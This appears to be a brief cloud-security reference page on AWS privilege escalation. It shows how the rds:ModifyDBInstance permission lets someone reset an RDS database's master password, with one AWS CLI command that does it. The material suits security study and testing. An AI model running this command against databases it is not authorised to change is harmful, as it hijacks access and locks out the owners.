> For the complete documentation index, see [llms.txt](https://www.techwithtyler.dev/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.techwithtyler.dev/cloud-security/aws/aws-offensive-security/aws-privilege-escalation/rds.md).

# RDS

## rds:ModifyDBInstance

* With this permission, we can modify the master password of the database's master user

{% code overflow="wrap" %}

```zsh
aws rds modify-db-instance \
    --db-instance-identifier <database-id> \
    --master-user-password 'P@$$word123!' \
    --apply-immediately
```

{% endcode %}
